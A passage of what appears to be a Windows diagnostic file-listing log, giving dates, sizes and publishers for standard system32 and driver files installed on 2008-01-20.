2008-01-20 20:24 - 2008-01-20 20:24 - 000117760 _____ (Microsoft Corporation) C:\Windows\system32\bcdsrv.dll
2008-01-20 20:24 - 2008-01-20 20:24 - 000114688 _____ (Microsoft Corporation) C:\Windows\system32\rtm.dll
2008-01-20 20:24 - 2008-01-20 20:24 - 000112640 _____ (Microsoft Corporation) C:\Windows\system32\verifier.exe
2008-01-20 20:24 - 2008-01-20 20:24 - 000112128 _____ (Microsoft Corporation) C:\Windows\system32\netdiagfx.dll
2008-01-20 20:24 - 2008-01-20 20:24 - 000112128 _____ (Microsoft Corporation) C:\Windows\system32\netcorehc.dll
2008-01-20 20:24 - 2008-01-20 20:24 - 000111616 _____ (Microsoft Corporation) C:\Windows\system32\activeds.tlb
2008-01-20 20:24 - 2008-01-20 20:24 - 000110592 _____ (Microsoft Corporation) C:\Windows\system32\msscript.ocx
2008-01-20 20:24 - 2008-01-20 20:24 - 000109056 _____ (Microsoft Corporation) C:\Windows\system32\SSShim.dll
2008-01-20 20:24 - 2008-01-20 20:24 - 000105984 _____ (Microsoft Corporation) C:\Windows\system32\shrink.dll
2008-01-20 20:24 - 2008-01-20 20:24 - 000105984 _____ (Microsoft Corporation) C:\Windows\system32\msdtc.exe
2008-01-20 20:24 - 2008-01-20 20:24 - 000105472 _____ (Microsoft Corporation) C:\Windows\system32\mtxoci.dll
2008-01-20 20:24 - 2008-01-20 20:24 - 000104960 _____ (Microsoft Corporation) C:\Windows\system32\mprddm.dll
2008-01-20 20:24 - 2008-01-20 20:24 - 000104448 _____ (Microsoft Corporation) C:\Windows\system32\DWWIN.EXE
2008-01-20 20:24 - 2008-01-20 20:24 - 000103936 _____ (Microsoft Corporation) C:\Windows\system32\NAPHLPR.DLL
2008-01-20 20:24 - 2008-01-20 20:24 - 000103936 _____ (Microsoft Corporation) C:\Windows\system32\AuxiliaryDisplayApi.dll
2008-01-20 20:24 - 2008-01-20 20:24 - 000101888 _____ (Microsoft Corporation) C:\Windows\system32\oledlg.dll
2008-01-20 20:24 - 2008-01-20 20:24 - 000101376 _____ (Microsoft Corporation) C:\Windows\system32\luainstall.dll
2008-01-20 20:24 - 2008-01-20 20:24 - 000100864 _____ (Microsoft Corporation) C:\Windows\system32\Drivers\ipnat.sys
2008-01-20 20:24 - 2008-01-20 20:24 - 000098304 _____ (Microsoft Corporation) C:\Windows\system32\TapiMigPlugin.dll
2008-01-20 20:24 - 2008-01-20 20:24 - 000098304 _____ (Microsoft Corporation) C:\Windows\system32\makecab.exe
2008-01-20 20:24 - 2008-01-20 20:24 - 000095744 _____ (Microsoft Corporation) C:\Windows\system32\Drivers\irda.sys
2008-01-20 20:24 - 2008-01-20 20:24 - 000095232 _____ (Microsoft Corporation) C:\Windows\system32\xactsrv.dll
2008-01-20 20:24 - 2008-01-20 20:24 - 000094208 _____ (Microsoft Corporation) C:\Windows\system32\diantz.exe
2008-01-20 20:24 - 2008-01-20 20:24 - 000093696 _____ (Microsoft Corporation) C:\Windows\system32\vssadmin.exe
2008-01-20 20:24 - 2008-01-20 20:24 - 000093184 _____ (Microsoft Corporation) C:\Windows\system32\esentutl.exe
2008-01-20 20:24 - 2008-01-20 20:24 - 000092672 _____ (Microsoft Corporation) C:\Windows\system32\ufat.dll
2008-01-20 20:24 - 2008-01-20 20:24 - 000091648 _____ (Microsoft Corporation) C:\Windows\system32\comrepl.dll
2008-01-20 20:24 - 2008-01-20 20:24 - 000090624 _____ (Microsoft Corporation) C:\Windows\system32\rasauto.dll
2008-01-20 20:24 - 2008-01-20 20:24 - 000089088 _____ (Microsoft Corporation) C:\Windows\system32\msdtclog.dll
2008-01-20 20:24 - 2008-01-20 20:24 - 000088576 _____ (Microsoft Corporation) C:\Windows\system32\ntdsapi.dll
2008-01-20 20:24 - 2008-01-20 20:24 - 000088064 _____ (Microsoft Corporation) C:\Windows\system32\dmview.ocx
2008-01-20 20:24 - 2008-01-20 20:24 - 000087552 _____ (Microsoft) C:\Windows\system32\Robocopy.exe
2008-01-20 20:24 - 2008-01-20 20:24 - 000087552 _____ (Microsoft Corporation) C:\Windows\system32\msoert2.dll
2008-01-20 20:24 - 2008-01-20 20:24 - 000087552 _____ (Microsoft Corporation) C:\Windows\system32\icfupgd.dll
2008-01-20 20:24 - 2008-01-20 20:24 - 000086528 _____ (Microsoft Corporation) C:\Windows\system32\TpmInit.exe
2008-01-20 20:24 - 2008-01-20 20:24 - 000086528 _____ (Microsoft Corporation) C:\Windows\system32\efsadu.dll
2008-01-20 20:24 - 2008-01-20 20:24 - 000086528 _____ (Microsoft Corporation) C:\Windows\system32\dskquota.dll
2008-01-20 20:24 - 2008-01-20 20:24 - 000085504 _____ (Microsoft Corporation) C:\Windows\system32\setupugc.exe
2008-01-20 20:24 - 2008-01-20 20:24 - 000084992 _____ (Microsoft Corporation) C:\Windows\system32\SessEnv.dll
2008-01-20 20:24 - 2008-01-20 20:24 - 000084992 _____ (Microsoft Corporation) C:\Windows\system32\cmstp.exe
2008-01-20 20:24 - 2008-01-20 20:24 - 000084480 _____ (Microsoft Corporation) C:\Windows\system32\Drivers\luafv.sys
2008-01-20 20:24 - 2008-01-20 20:24 - 000083968 _____ (Microsoft Corporation) C:\Windows\system32\hlink.dll
2008-01-20 20:24 - 2008-01-20 20:24 - 000083456 _____ (Microsoft Corporation) C:\Windows\system32\usbui.dll
2008-01-20 20:24 - 2008-01-20 20:24 - 000081920 _____ (Microsoft Corporation) C:\Windows\system32\QSVRMGMT.DLL
2008-01-20 20:24 - 2008-01-20 20:24 - 000081920 _____ (Microsoft Corporation) C:\Windows\system32\dwmredir.dll
2008-01-20 20:24 - 2008-01-20 20:24 - 000081920 _____ (Microsoft Corporation) C:\Windows\system32\browser.dll
2008-01-20 20:24 - 2008-01-20 20:24 - 000081408 _____ (Microsoft Corporation) C:\Windows\system32\rascfg.dll
2008-01-20 20:24 - 2008-01-20 20:24 - 000080896 _____ (Microsoft Corporation) C:\Windows\system32\tasklist.exe
2008-01-20 20:24 - 2008-01-20 20:24 - 000079360 _____ (Microsoft Corporation) C:\Windows\system32\QUTIL.DLL
2008-01-20 20:24 - 2008-01-20 20:24 - 000078848 _____ (Microsoft Corporation) C:\Windows\system32\taskkill.exe
2008-01-20 20:24 - 2008-01-20 20:24 - 000078848 _____ (Microsoft Corporation) C:\Windows\system32\olecli32.dll
2008-01-20 20:24 - 2008-01-20 20:24 - 000077824 _____ (Microsoft Corporation) C:\Windows\system32\olethk32.dll
2008-01-20 20:24 - 2008-01-20 20:24 - 000077824 _____ (Microsoft Corporation) C:\Windows\system32\odbccu32.dll
2008-01-20 20:24 - 2008-01-20 20:24 - 000077824 _____ (Microsoft Corporation) C:\Windows\system32\odbccr32.dll
2008-01-20 20:24 - 2008-01-20 20:24 - 000076288 _____ (Microsoft Corporation) C:\Windows\system32\Drivers\rasl2tp.sys
2008-01-20 20:24 - 2008-01-20 20:24 - 000075264 _____ (Microsoft Corporation) C:\Windows\system32\trkwks.dll
2008-01-20 20:24 - 2008-01-20 20:24 - 000074240 _____ (Microsoft Corporation) C:\Windows\system32\IPBusEnum.dll
2008-01-20 20:24 - 2008-01-20 20:24 - 000073728 _____ (Microsoft Corporation) C:\Windows\system32\wdi.dll
2008-01-20 20:24 - 2008-01-20 20:24 - 000072704 _____ (Microsoft Corporation) C:\Windows\system32\cmdl32.exe
2008-01-20 20:24 - 2008-01-20 20:24 - 000071680 _____ (Microsoft Corporation) C:\Windows\system32\msacm32.dll
2008-01-20 20:24 - 2008-01-20 20:24 - 000071680 _____ (Microsoft Corporation) C:\Windows\system32\cabinet.dll
2008-01-20 20:24 - 2008-01-20 20:24 - 000071168 _____ (Microsoft Corporation) C:\Windows\system32\rasman.dll
2008-01-20 20:24 - 2008-01-20 20:24 - 000070144 _____ (Microsoft Corporation) C:\Windows\system32\amstream.dll
2008-01-20 20:24 - 2008-01-20 20:24 - 000069632 _____ (Microsoft Corporation) C:\Windows\system32\rasqec.dll
2008-01-20 20:24 - 2008-01-20 20:24 - 000069632 _____ (Microsoft Corporation) C:\Windows\system32\QCLIPROV.DLL
2008-01-20 20:24 - 2008-01-20 20:24 - 000069120 _____ (Microsoft Corporation) C:\Windows\system32\vsstrace.dll
2008-01-20 20:24 - 2008-01-20 20:24 - 000069120 _____ (Microsoft Corporation) C:\Windows\system32\GuidedHelp.dll
2008-01-20 20:24 - 2008-01-20 20:24 - 000068608 _____ (Microsoft Corporation) C:\Windows\system32\mprdim.dll
2008-01-20 20:24 - 2008-01-20 20:24 - 000068096 _____ (Microsoft Corporation) C:\Windows\system32\KMSVC.DLL
2008-01-20 20:24 - 2008-01-20 20:24 - 000067584 _____ (Microsoft Corporation) C:\Windows\system32\napdsnap.dll
2008-01-20 20:24 - 2008-01-20 20:24 - 000067584 _____ (Microsoft Corporation) C:\Windows\system32\EAPQEC.DLL
2008-01-20 20:24 - 2008-01-20 20:24 - 000066048 _____ (Microsoft Corporation) C:\Windows\system32\MuiUnattend.exe
2008-01-20 20:24 - 2008-01-20 20:24 - 000066048 _____ (Microsoft Corporation) C:\Windows\system32\driverquery.exe
2008-01-20 20:24 - 2008-01-20 20:24 - 000066048 _____ (Microsoft Corporation) C:\Windows\system32\DHCPQEC.DLL
2008-01-20 20:24 - 2008-01-20 20:24 - 000065536 _____ (Microsoft Corporation) C:\Windows\system32\resutils.dll
2008-01-20 20:24 - 2008-01-20 20:24 - 000065024 _____ (Microsoft Corporation) C:\Windows\system32\w32tm.exe
2008-01-20 20:24 - 2008-01-20 20:24 - 000065024 _____ (Microsoft Corporation) C:\Windows\system32\getmac.exe
2008-01-20 20:24 - 2008-01-20 20:24 - 000064512 _____ (Microsoft Corporation) C:\Windows\system32\spbcd.dll
2008-01-20 20:24 - 2008-01-20 20:24 - 000064512 _____ (Microsoft Corporation) C:\Windows\system32\findnetprinters.dll
2008-01-20 20:24 - 2008-01-20 20:24 - 000064512 _____ (Microsoft Corporation) C:\Windows\system32\dxva2.dll
2008-01-20 20:24 - 2008-01-20 20:24 - 000064512 _____ (Microsoft Corporation) C:\Windows\system32\cmicryptinstall.dll
2008-01-20 20:24 - 2008-01-20 20:24 - 000064000 _____ (Microsoft Corporation) C:\Windows\system32\Drivers\mpsdrv.sys
2008-01-20 20:24 - 2008-01-20 20:24 - 000064000 _____ (Microsoft Corporation) C:\Windows\system32\devenum.dll
2008-01-20 20:24 - 2008-01-20 20:24 - 000063488 _____ (Microsoft Corporation) C:\Windows\system32\ntlanman.dll
2008-01-20 20:24 - 2008-01-20 20:24 - 000062976 _____ (Microsoft Corporation) C:\Windows\system32\Drivers\raspptp.sys
2008-01-20 20:24 - 2008-01-20 20:24 - 000062464 _____ (Microsoft Corporation) C:\Windows\system32\winethc.dll
2008-01-20 20:24 - 2008-01-20 20:24 - 000062464 _____ (Microsoft Corporation) C:\Windows\system32\TSpkg.dll
2008-01-20 20:24 - 2008-01-20 20:24 - 000062464 _____ (Microsoft Corporation) C:\Windows\system32\Drivers\wanarp.sys
2008-01-20 20:24 - 2008-01-20 20:24 - 000062464 _____ (Microsoft Corporation) C:\Windows\system32\colbact.dll
2008-01-20 20:24 - 2008-01-20 20:24 - 000061440 _____ (Microsoft Corporation) C:\Windows\system32\winipsec.dll
2008-01-20 20:24 - 2008-01-20 20:24 - 000061440 _____ (Microsoft Corporation) C:\Windows\system32\dhcpsapi.dll
2008-01-20 20:24 - 2008-01-20 20:24 - 000060416 _____ (Microsoft Corporation) C:\Windows\system32\Drivers\rspndr.sys
2008-01-20 20:24 - 2008-01-20 20:24 - 000060124 _____ C:\Windows\system32\tcpmon.ini
2008-01-20 20:24 - 2008-01-20 20:24 - 000059392 _____ (Microsoft Corporation) C:\Windows\system32\alg.exe
2008-01-20 20:24 - 2008-01-20 20:24 - 000058936 _____ (Microsoft Corporation) C:\Windows\system32\Drivers\fileinfo.sys
2008-01-20 20:24 - 2008-01-20 20:24 - 000058880 _____ (Microsoft Corporation) C:\Windows\system32\msobjs.dll
2008-01-20 20:24 - 2008-01-20 20:24 - 000058880 _____ (Microsoft Corporation) C:\Windows\bfsvc.exe
2008-01-20 20:24 - 2008-01-20 20:24 - 000058368 _____ (Microsoft Corporation) C:\Windows\system32\remotepg.dll
2008-01-20 20:24 - 2008-01-20 20:24 - 000057856 _____ (Microsoft Corporation) C:\Windows\system32\cryptdll.dll
2008-01-20 20:24 - 2008-01-20 20:24 - 000056320 _____ (Microsoft Corporation) C:\Windows\system32\wscmisetup.dll
2008-01-20 20:24 - 2008-01-20 20:24 - 000056320 _____ (Microsoft Corporation) C:\Windows\system32\vga256.dll
2008-01-20 20:24 - 2008-01-20 20:24 - 000056320 _____ (Microsoft Corporation) C:\Windows\system32\tbssvc.dll
2008-01-20 20:24 - 2008-01-20 20:24 - 000056320 _____ (Microsoft Corporation) C:\Windows\system32\graftabl.com
2008-01-20 20:24 - 2008-01-20 20:24 - 000055296 _____ (Microsoft Corporation) C:\Windows\system32\fsutil.exe
2008-01-20 20:24 - 2008-01-20 20:24 - 000054272 _____ (Microsoft Corporation) C:\Windows\system32\fwcfg.dll
2008-01-20 20:24 - 2008-01-20 20:24 - 000053760 _____ (Microsoft Corporation) C:\Windows\system32\l2gpstore.dll
2008-01-20 20:24 - 2008-01-20 20:24 - 000053248 _____ (Microsoft Corporation) C:\Windows\system32\PNPXAssocPrx.dll
2008-01-20 20:24 - 2008-01-20 20:24 - 000053248 _____ (Microsoft Corporation) C:\Windows\system32\msident.dll
2008-01-20 20:24 - 2008-01-20 20:24 - 000053248 _____ (Microsoft Corporation) C:\Windows\system32\d3dxof.dll
2008-01-20 20:24 - 2008-01-20 20:24 - 000052736 _____ (Microsoft Corporation) C:\Windows\system32\inetmib1.dll
2008-01-20 20:24 - 2008-01-20 20:24 - 000052736 _____ (Microsoft Corporation) C:\Windows\system32\expand.exe
2008-01-20 20:24 - 2008-01-20 20:24 - 000050176 _____ (Microsoft Corporation) C:\Windows\system32\NapiNSP.dll
2008-01-20 20:24 - 2008-01-20 20:24 - 000050176 _____ (Microsoft Corporation) C:\Windows\system32\gacinstall.dll
2008-01-20 20:24 - 2008-01-20 20:24 - 000049664 _____ (Microsoft Corporation) C:\Windows\system32\Drivers\ndproxy.sys
2008-01-20 20:24 - 2008-01-20 20:24 - 000048128 _____ (Microsoft Corporation) C:\Windows\system32\net.exe
2008-01-20 20:24 - 2008-01-20 20:24 - 000048128 _____ (Microsoft Corporation) C:\Windows\system32\ncobjapi.dll
2008-01-20 20:24 - 2008-01-20 20:24 - 000048128 _____ (Microsoft Corporation) C:\Windows\system32\dnshc.dll
2008-01-20 20:24 - 2008-01-20 20:24 - 000048128 _____ (Microsoft Corporation) C:\Windows\system32\bcdprov.dll
2008-01-20 20:24 - 2008-01-20 20:24 - 000047616 _____ (Microsoft Corporation) C:\Windows\system32\Drivers\ipfltdrv.sys
2008-01-20 20:24 - 2008-01-20 20:24 - 000047616 _____ (Microsoft Corporation) C:\Windows\system32\cmutil.dll
2008-01-20 20:24 - 2008-01-20 20:24 - 000047104 _____ (Microsoft Corporation) C:\Windows\system32\syssetup.dll
2008-01-20 20:24 - 2008-01-20 20:24 - 000047104 _____ (Microsoft Corporation) C:\Windows\system32\Sens.dll
2008-01-20 20:24 - 2008-01-20 20:24 - 000047104 _____ (Microsoft Corporation) C:\Windows\system32\Drivers\lltdio.sys
2008-01-20 20:24 - 2008-01-20 20:24 - 000047104 _____ (Microsoft Corporation) C:\Windows\system32\cfgbkend.dll
2008-01-20 20:24 - 2008-01-20 20:24 - 000046592 _____ (Microsoft Corporation) C:\Windows\system32\setbcdlocale.dll
2008-01-20 20:24 - 2008-01-20 20:24 - 000046592 _____ (Microsoft Corporation) C:\Windows\system32\pdhui.dll
2008-01-20 20:24 - 2008-01-20 20:24 - 000046080 _____ (Microsoft Corporation) C:\Windows\system32\NAPCRYPT.DLL
2008-01-20 20:24 - 2008-01-20 20:24 - 000045568 _____ (Microsoft Corporation) C:\Windows\system32\ucsvc.exe
2008-01-20 20:24 - 2008-01-20 20:24 - 000045568 _____ (Microsoft Corporation) C:\Windows\system32\g711codc.ax
2008-01-20 20:24 - 2008-01-20 20:24 - 000045568 _____ (Microsoft Corporation) C:\Windows\system32\dot3dlg.dll
2008-01-20 20:24 - 2008-01-20 20:24 - 000045056 _____ (Microsoft Corporation) C:\Windows\system32\mmcss.dll
2008-01-20 20:24 - 2008-01-20 20:24 - 000045056 _____ (Microsoft Corporation) C:\Windows\system32\dot3api.dll
2008-01-20 20:24 - 2008-01-20 20:24 - 000044544 _____ (Microsoft Corporation) C:\Windows\system32\sppnp.dll
2008-01-20 20:24 - 2008-01-20 20:24 - 000044032 _____ (Microsoft Corporation) C:\Windows\system32\regini.exe
2008-01-20 20:24 - 2008-01-20 20:24 - 000043520 _____ (Microsoft Corporation) C:\Windows\system32\rshx32.dll
2008-01-20 20:24 - 2008-01-20 20:24 - 000043008 _____ (Microsoft Corporation) C:\Windows\system32\TimeDateMUICallback.dll
2008-01-20 20:24 - 2008-01-20 20:24 - 000043008 _____ (Microsoft Corporation) C:\Windows\system32\dot3gpclnt.dll
2008-01-20 20:24 - 2008-01-20 20:24 - 000042496 _____ (Microsoft Corporation) C:\Windows\system32\osblprov.dll
2008-01-20 20:24 - 2008-01-20 20:24 - 000041984 _____ (Microsoft Corporation) C:\Windows\system32\vdmredir.dll
2008-01-20 20:24 - 2008-01-20 20:24 - 000041984 _____ (Microsoft Corporation) C:\Windows\system32\setupcl.exe
2008-01-20 20:24 - 2008-01-20 20:24 - 000041472 _____ (Microsoft Corporation) C:\Windows\system32\lpremove.exe
2008-01-20 20:24 - 2008-01-20 20:24 - 000041472 _____ (Microsoft Corporation) C:\Windows\system32\eappprxy.dll
2008-01-20 20:24 - 2008-01-20 20:24 - 000041472 _____ (Microsoft Corporation) C:\Windows\system32\auditpol.exe
2008-01-20 20:24 - 2008-01-20 20:24 - 000040960 _____ (Microsoft Corporation) C:\Windows\system32\RegCtrl.dll
2008-01-20 20:24 - 2008-01-20 20:24 - 000040448 _____ (Microsoft Corporation) C:\Windows\system32\psbase.dll
2008-01-20 20:24 - 2008-01-20 20:24 - 000040448 _____ (Microsoft Corporation) C:\Windows\system32\lnkstub.exe
2008-01-20 20:24 - 2008-01-20 20:24 - 000039936 _____ (Microsoft Corporation) C:\Windows\system32\dwmapi.dll
2008-01-20 20:24 - 2008-01-20 20:24 - 000039424 _____ (Microsoft Corporation) C:\Windows\system32\rasphone.exe
2008-01-20 20:24 - 2008-01-20 20:24 - 000038912 _____ (Microsoft Corporation) C:\Windows\system32\xolehlp.dll
2008-01-20 20:24 - 2008-01-20 20:24 - 000038912 _____ (Microsoft Corporation) C:\Windows\system32\sfc_os.dll
2008-01-20 20:24 - 2008-01-20 20:24 - 000038400 _____ (Microsoft Corporation) C:\Windows\system32\runonce.exe
2008-01-20 20:24 - 2008-01-20 20:24 - 000036864 _____ (Microsoft Corporation) C:\Windows\system32\xcopy.exe
2008-01-20 20:24 - 2008-01-20 20:24 - 000036352 _____ (Microsoft Corporation) C:\Windows\system32\esentprf.dll
2008-01-20 20:24 - 2008-01-20 20:24 - 000036352 _____ (Microsoft Corporation) C:\Windows\system32\ComputerDefaults.exe
2008-01-20 20:24 - 2008-01-20 20:24 - 000035840 _____ (Microsoft Corporation) C:\Windows\system32\UI0Detect.exe
2008-01-20 20:24 - 2008-01-20 20:24 - 000035840 _____ (Microsoft Corporation) C:\Windows\system32\Drivers\netbios.sys
2008-01-20 20:24 - 2008-01-20 20:24 - 000035328 _____ (Microsoft Corporation) C:\Windows\system32\SecEdit.exe
2008-01-20 20:24 - 2008-01-20 20:24 - 000035328 _____ (Microsoft Corporation) C:\Windows\system32\mspatcha.dll
2008-01-20 20:24 - 2008-01-20 20:24 - 000035328 _____ (Microsoft Corporation) C:\Windows\system32\dispci.dll
2008-01-20 20:24 - 2008-01-20 20:24 - 000034816 _____ (Microsoft Corporation) C:\Windows\system32\waitfor.exe
2008-01-20 20:24 - 2008-01-20 20:24 - 000034816 _____ (Microsoft Corporation) C:\Windows\system32\RpcPing.exe
2008-01-20 20:24 - 2008-01-20 20:24 - 000034304 _____ (Microsoft Corporation) C:\Windows\system32\usbmon.dll
2008-01-20 20:24 - 2008-01-20 20:24 - 000034304 _____ (Microsoft Corporation) C:\Windows\system32\napipsec.dll
2008-01-20 20:24 - 2008-01-20 20:24 - 000032768 _____ (Microsoft Corporation) C:\Windows\system32\cmlua.dll
2008-01-20 20:24 - 2008-01-20 20:24 - 000031744 _____ (Microsoft Corporation) C:\Windows\system32\Drivers\modem.sys
2008-01-20 20:24 - 2008-01-20 20:24 - 000031232 _____ (Microsoft Corporation) C:\Windows\system32\cmcfg32.dll
2008-01-20 20:24 - 2008-01-20 20:24 - 000029696 _____ (Microsoft Corporation) C:\Windows\system32\utildll.dll
2008-01-20 20:24 - 2008-01-20 20:24 - 000029696 _____ (Microsoft Corporation) C:\Windows\system32\shutdown.exe
2008-01-20 20:24 - 2008-01-20 20:24 - 000029696 _____ (Microsoft Corporation) C:\Windows\system32\dsauth.dll
2008-01-20 20:24 - 2008-01-20 20:24 - 000029184 _____ (Microsoft Corporation) C:\Windows\system32\profprov.dll
2008-01-20 20:24 - 2008-01-20 20:24 - 000029184 _____ (Microsoft Corporation) C:\Windows\system32\ndfetw.dll
2008-01-20 20:24 - 2008-01-20 20:24 - 000029184 _____ (Microsoft Corporation) C:\Windows\system32\Drivers\tdtcp.sys
2008-01-20 20:24 - 2008-01-20 20:24 - 000028672 _____ (Microsoft Corporation) C:\Windows\system32\odbcbcp.dll
2008-01-20 20:24 - 2008-01-20 20:24 - 000028160 _____ (Microsoft Corporation) C:\Windows\system32\unattendedjoin.exe
2008-01-20 20:24 - 2008-01-20 20:24 - 000028160 _____ (Microsoft Corporation) C:\Windows\system32\AzSqlExt.dll
2008-01-20 20:24 - 2008-01-20 20:24 - 000027648 _____ (Microsoft Corporation) C:\Windows\system32\olesvr32.dll
2008-01-20 20:24 - 2008-01-20 20:24 - 000027648 _____ (Microsoft Corporation) C:\Windows\system32\Drivers\filetrace.sys
2008-01-20 20:24 - 2008-01-20 20:24 - 000027136 _____ (Microsoft Corporation) C:\Windows\system32\sxstrace.exe
2008-01-20 20:24 - 2008-01-20 20:24 - 000027136 _____ (Microsoft Corporation) C:\Windows\system32\mtxlegih.dll
2008-01-20 20:24 - 2008-01-20 20:24 - 000027136 _____ (Microsoft Corporation) C:\Windows\system32\icacls.exe
2008-01-20 20:24 - 2008-01-20 20:24 - 000026624 _____ (Microsoft Corporation) C:\Windows\system32\wtsapi32.dll
2008-01-20 20:24 - 2008-01-20 20:24 - 000026624 _____ (Microsoft Corporation) C:\Windows\system32\mfcsubs.dll
2008-01-20 20:24 - 2008-01-20 20:24 - 000026112 _____ (Microsoft Corporation) C:\Windows\system32\idndl.dll
2008-01-20 20:24 - 2008-01-20 20:24 - 000026112 _____ (Microsoft Corporation) C:\Windows\system32\cmpbk32.dll
2008-01-20 20:24 - 2008-01-20 20:24 - 000025600 _____ (Microsoft Corporation) C:\Windows\system32\netcfg.exe
2008-01-20 20:24 - 2008-01-20 20:24 - 000025600 _____ (Microsoft Corporation) C:\Windows\system32\LangCleanupSysprepAction.dll
2008-01-20 20:24 - 2008-01-20 20:24 - 000025088 _____ (Microsoft Corporation) C:\Windows\system32\userinit.exe
2008-01-20 20:24 - 2008-01-20 20:24 - 000025088 _____ (Microsoft Corporation) C:\Windows\system32\Nlsdl.dll
2008-01-20 20:24 - 2008-01-20 20:24 - 000025088 _____ (Microsoft Corporation) C:\Windows\system32\Drivers\vga.sys
2008-01-20 20:24 - 2008-01-20 20:24 - 000024576 _____ (Microsoft Corporation) C:\Windows\system32\Drivers\tape.sys
2008-01-20 20:24 - 2008-01-20 20:24 - 000024576 _____ (Microsoft Corporation) C:\Windows\system32\at.exe
2008-01-20 20:24 - 2008-01-20 20:24 - 000024120 _____ (Microsoft Corporation) C:\Windows\system32\BOOTVID.DLL
2008-01-20 20:24 - 2008-01-20 20:24 - 000024064 _____ (Microsoft Corporation) C:\Windows\system32\amxread.dll
2008-01-20 20:24 - 2008-01-20 20:24 - 000023040 _____ (Microsoft Corporation) C:\Windows\system32\wmiprop.dll
2008-01-20 20:24 - 2008-01-20 20:24 - 000023040 _____ (Microsoft Corporation) C:\Windows\system32\fmifs.dll
2008-01-20 20:24 - 2008-01-20 20:24 - 000022528 _____ (Microsoft Corporation) C:\Windows\system32\upnpcont.exe
2008-01-20 20:24 - 2008-01-20 20:24 - 000022528 _____ (Microsoft Corporation) C:\Windows\system32\netiougc.exe
2008-01-20 20:24 - 2008-01-20 20:24 - 000022016 _____ (Microsoft Corporation) C:\Windows\system32\sxsstore.dll
2008-01-20 20:24 - 2008-01-20 20:24 - 000022016 _____ (Microsoft Corporation) C:\Windows\system32\mtxdm.dll
2008-01-20 20:24 - 2008-01-20 20:24 - 000021504 _____ (Microsoft Corporation) C:\Windows\system32\vga64k.dll
2008-01-20 20:24 - 2008-01-20 20:24 - 000021504 _____ (Microsoft Corporation) C:\Windows\system32\netbtugc.exe
2008-01-20 20:24 - 2008-01-20 20:24 - 000021048 _____ (Microsoft Corporation) C:\Windows\system32\Drivers\spldr.sys
2008-01-20 20:24 - 2008-01-20 20:24 - 000020992 _____ (Microsoft Corporation) C:\Windows\system32\Drivers\tdi.sys
2008-01-20 20:24 - 2008-01-20 20:24 - 000020992 _____ (Microsoft Corporation) C:\Windows\system32\Drivers\ndistapi.sys
2008-01-20 20:24 - 2008-01-20 20:24 - 000020480 _____ (Microsoft Corporation) C:\Windows\system32\RacAgent.exe
2008-01-20 20:24 - 2008-01-20 20:24 - 000019968 _____ (Microsoft Corporation) C:\Windows\system32\seclogon.dll
2008-01-20 20:24 - 2008-01-20 20:24 - 000019968 _____ (Microsoft Corporation) C:\Windows\system32\perfnet.dll
2008-01-20 20:24 - 2008-01-20 20:24 - 000019968 _____ (Microsoft Corporation) C:\Windows\system32\osbaseln.dll
2008-01-20 20:24 - 2008-01-20 20:24 - 000019968 _____ (Microsoft Corporation) C:\Windows\system32\lsmproxy.dll
2008-01-20 20:24 - 2008-01-20 20:24 - 000019968 _____ (Microsoft Corporation) C:\Windows\system32\eventcls.dll
2008-01-20 20:24 - 2008-01-20 20:24 - 000018944 _____ (Microsoft Corporation) C:\Windows\system32\ias.dll
2008-01-20 20:24 - 2008-01-20 20:24 - 000018944 _____ (Microsoft Corporation) C:\Windows\system32\Drivers\mcd.sys
2008-01-20 20:24 - 2008-01-20 20:24 - 000018944 _____ (Microsoft Corporation) C:\Windows\system32\dmutil.dll
2008-01-20 20:24 - 2008-01-20 20:24 - 000018432 _____ (Microsoft Corporation) C:\Windows\system32\nsisvc.dll
2008-01-20 20:24 - 2008-01-20 20:24 - 000017920 _____ (Microsoft Corporation) C:\Windows\system32\wfapigp.dll
2008-01-20 20:24 - 2008-01-20 20:24 - 000017920 _____ (Microsoft Corporation) C:\Windows\system32\PlaySndSrv.dll
2008-01-20 20:24 - 2008-01-20 20:24 - 000017920 _____ (Microsoft Corporation) C:\Windows\system32\Drivers\tdpipe.sys
2008-01-20 20:24 - 2008-01-20 20:24 - 000017920 _____ (Microsoft Corporation) C:\Windows\system32\capisp.dll
2008-01-20 20:24 - 2008-01-20 20:24 - 000017408 _____ (Microsoft Corporation) C:\Windows\system32\perfts.dll
2008-01-20 20:24 - 2008-01-20 20:24 - 000017408 _____ (Microsoft Corporation) C:\Windows\system32\iashost.exe
2008-01-20 20:24 - 2008-01-20 20:24 - 000017408 _____ (Microsoft Corporation) C:\Windows\system32\Drivers\smclib.sys
2008-01-20 20:24 - 2008-01-20 20:24 - 000017408 _____ (Microsoft Corporation) C:\Windows\system32\Drivers\asyncmac.sys
2008-01-20 20:24 - 2008-01-20 20:24 - 000017408 _____ (Microsoft Corporation) C:\Windows\system32\convert.exe
2008-01-20 20:24 - 2008-01-20 20:24 - 000017408 _____ (Microsoft Corporation) C:\Windows\system32\cfgmgr32.dll
2008-01-20 20:24 - 2008-01-20 20:24 - 000016896 _____ (Microsoft Corporation) C:\Windows\system32\WINSRPC.DLL
2008-01-20 20:24 - 2008-01-20 20:24 - 000016896 _____ (Microsoft Corporation) C:\Windows\system32\pots.dll
2008-01-20 20:24 - 2008-01-20 20:24 - 000016896 _____ (Microsoft Corporation) C:\Windows\system32\Drivers\ndisuio.sys
2008-01-20 20:24 - 2008-01-20 20:24 - 000016384 _____ (Microsoft Corporation) C:\Windows\system32\xmlprovi.dll
2008-01-20 20:24 - 2008-01-20 20:24 - 000016384 _____ (Microsoft Corporation) C:\Windows\system32\Drivers\nsiproxy.sys
2008-01-20 20:24 - 2008-01-20 20:24 - 000015872 _____ (Microsoft Corporation) C:\Windows\system32\spopk.dll
2008-01-20 20:24 - 2008-01-20 20:24 - 000015872 _____ (Microsoft Corporation) C:\Windows\system32\sfc.exe
2008-01-20 20:24 - 2008-01-20 20:24 - 000015872 _____ (Microsoft Corporation) C:\Windows\system32\Drivers\ws2ifsl.sys
2008-01-20 20:24 - 2008-01-20 20:24 - 000015872 _____ (Microsoft Corporation) C:\Windows\system32\credssp.dll
2008-01-20 20:24 - 2008-01-20 20:24 - 000015360 _____ (Microsoft Corporation) C:\Windows\system32\rasctrs.dll
2008-01-20 20:24 - 2008-01-20 20:24 - 000015360 _____ (Microsoft Corporation) C:\Windows\system32\PING.EXE
2008-01-20 20:24 - 2008-01-20 20:24 - 000015360 _____ (Microsoft Corporation) C:\Windows\system32\Drivers\TUNMP.SYS
2008-01-20 20:24 - 2008-01-20 20:24 - 000014848 _____ (Microsoft Corporation) C:\Windows\system32\winnsi.dll
